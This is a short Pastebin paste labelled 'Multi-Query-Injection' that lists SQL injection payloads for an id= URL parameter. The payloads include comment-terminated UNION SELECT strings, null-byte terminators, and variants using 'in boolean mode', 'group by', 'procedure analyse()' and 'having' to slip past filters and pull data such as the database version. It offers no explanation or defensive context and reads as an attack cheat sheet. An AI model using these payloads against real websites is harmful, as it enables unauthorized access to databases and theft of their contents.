Advertisement
BlackRoas2017

GHI

Oct 9th, 2017
220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. Multi-Query-Injection
  2.  
  3. id=1-- -' our query-- -
  4. id=1%23' our query -- -
  5. id=1 union select null,null,null-- -' our query %23
  6.  
  7. =1 ;%00 ' and 0 union select 1 ;%00!
  8. =1 -- - ' and 0 union select 1 -- -%
  9. =1 -- - ' or 1 union select 1,2 limit 2 -- -
  10.  
  11. -----------------------------------------------------------
  12. Other Method
  13.  
  14. =1' in boolean mode) UNION SELECT 1,2-- -
  15. =1' group by 1 union select 1,2-- -
  16. =1' procedure analyse() union select 1,2-- -
  17. =1) having 1=0 union select '11111' from dual -- - Where 0 %23
  18. =1 union select 1 LIMIT 0,1-- -
  19. '=0=column union select version() limit 1-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement